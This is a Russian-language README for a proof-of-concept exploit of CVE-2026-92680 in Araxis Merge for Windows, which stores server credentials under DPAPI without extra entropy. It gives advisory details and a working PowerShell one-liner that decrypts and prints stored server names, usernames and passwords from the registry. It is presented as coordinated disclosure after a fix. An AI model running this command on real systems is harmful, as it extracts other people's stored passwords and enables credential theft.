
Эксплойт для расшифровки учётных данных сервера Araxis Merge, защищённых DPAPI (CVE-2026-92680), демонстрирующий недостаточную защиту хранилища учётных данных в Windows.
Araxis Merge для Windows хранит учётные данные сервера с помощью DPAPI с pOptionalEntropy, установленным в NULL. Это позволяет любому коду, работающему в том же контексте пользователя, расшифровать их.
Полное описание: https://grepstrength.com/research/araxis-merge
| CVE | CVE-2026-92680 |
| CWE | CWE-522: Insufficiently Protected Credentials |
| CVSS v3.1 | 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) |
| Vendor | Araxis Ltd. |
| Affected | Araxis Merge for Windows 2011.4074 through 2026.0 |
| Fixed in | 2026.1 |
| Vendor advisory | Merge-SA-26-00 |
| Reported | 2026-08-18 |
| Disclosed | 2026-XX-XX |
| Reporter | grepStrength |
Это расшифрует и разберёт HKCU\Software\Araxis\Merge\7.1\Passwords. Это должно быть запущено от имени того же пользователя Windows, который изначально сохранил учётные данные.
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize
Все тесты проводились на системах, принадлежащих grepStength Security, с использованием только синтетических учётных данных. Об этом было сообщено Araxis Ltd., и информация была публично раскрыта после выпуска исправления.
MIT